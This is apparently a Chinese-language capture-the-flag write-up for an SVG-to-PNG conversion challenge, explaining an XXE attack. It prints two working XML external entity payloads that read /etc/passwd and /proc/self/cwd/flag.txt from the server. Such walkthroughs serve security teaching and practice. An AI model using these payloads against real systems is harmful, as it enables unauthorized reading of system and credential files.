打开题目
给了提示,使用魔法将svg转换成png,搜索了一下svg
是一种XML标记语言,既然是XML,就可能存在XXE漏洞
构造一个XML外部实体注入(XXE)攻击,尝试一下
<!ENTITY file SYSTEM "file:///etc/passwd" > 定义一个外部实体 file任意文件读取,读取/etc/passwd用户配置文件
在SVG部分中,&file; 通过文本引用该实体,试图将文件的内容嵌入到SVG输出中。
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE note [
<!ENTITY file SYSTEM "file:///etc/passwd" >
]>
<svg height="300" width="300">
<text x="30" y="30">&file;</text>
</svg>
上传发现可以正常读取
然后构造读取flag
/proc 文件系统:它是一个虚拟文件系统,提供了运行时系统信息,如进程信息、内存状态、系统配置等。
/proc/self:它是指当前正在访问该路径的进程自身。无论哪个进程访问 /proc/self,它总是指向调用者进程的 /proc/pid 目录。
cwd:代表"current working directory"(当前工作目录)。当你访问 /proc/self/cwd/ 时,你实际上是在查看当前进程的工作目录。
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE note [
<!ENTITY file SYSTEM "file:///proc/self/cwd/flag.txt" >
]>
<svg height="300" width="3000">
<text x="30" y="30">&file;</text>
</svg>
上传得到flag
